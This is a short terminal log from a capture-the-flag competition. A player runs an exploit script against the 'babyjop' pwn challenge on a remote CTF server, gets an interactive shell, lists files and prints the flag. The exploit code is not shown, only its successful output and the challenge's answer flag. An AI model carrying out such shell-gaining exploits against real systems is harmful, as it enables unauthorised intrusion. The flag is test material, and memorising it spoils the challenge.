mito@ubuntu:~/CTF/THC_CTF_2021/Pwn_Babyjop_250$ python solve.py r
[*] '/home/mito/CTF/THC_CTF_2021/Pwn_Babyjop_250/babyjop'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to remote1.thcon.party on port 10902: Done
[*] Switching to interactive mode
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
$ ls -l
total 924
-rwxr-xr-x 1 root root 872136 Jun  8 20:45 babyjop
-rw------- 1 user user 335872 Jun 15 04:42 core
-rw-r--r-- 1 root root     33 Jun  8 20:45 flag.txt
$ cat flag.txt
THCon21{J0P_1t_l1k3_1t5_h0o0t!!}